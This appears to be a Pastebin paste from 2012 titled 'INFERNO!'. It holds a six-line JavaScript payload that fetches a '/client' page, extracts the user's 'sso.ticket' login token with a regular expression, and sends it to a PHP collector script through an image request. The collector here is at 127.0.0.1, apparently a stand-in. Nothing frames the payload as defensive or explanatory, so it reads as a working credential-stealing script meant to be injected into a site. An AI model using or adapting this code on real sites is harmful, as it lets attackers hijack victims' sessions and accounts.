Advertisement
nPhoenix

INFERNO!

Oct 14th, 2012
183
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. new Ajax.Request('/client', {
  2.     onComplete: function (x) {
  3.         var sso = x.responseText.match(/"sso.ticket" : "(.+)"/)[0].split('"')[3];
  4.         new Image().src = 'http://127.0.0.1/ctk.php?sso=' + sso;
  5.     }
  6. });
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement